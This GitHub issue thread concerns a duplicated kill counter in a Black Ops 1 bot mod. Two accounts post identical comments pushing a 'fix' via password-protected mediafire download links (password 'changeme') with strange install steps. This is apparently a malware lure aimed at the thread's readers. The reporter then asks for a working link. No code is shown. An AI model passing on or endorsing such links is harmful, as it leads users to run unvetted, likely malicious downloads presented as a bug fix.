### ISSUE TITLE
duplicate error in casualty counter

### ISSUE THREAD

**Issue by Nacho35** [ineedbots/bo1_bot_warfare#25]
_This error only occurs in the last four game modes which are one in the chamber, sniper, bounce bounce, gun game when loading the bots on the left side below everything that appears in the kill counter is duplicated whether the bots that are added or deaths reported to solve the problem._

**Comment by ineedbots** [comment]
i dont know what you mean

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Nacho35** [comment]
Hello brother, were you able to solve the problem?

**Comment by Nacho35** [comment]
hi the link is not working anymore do you have other link?
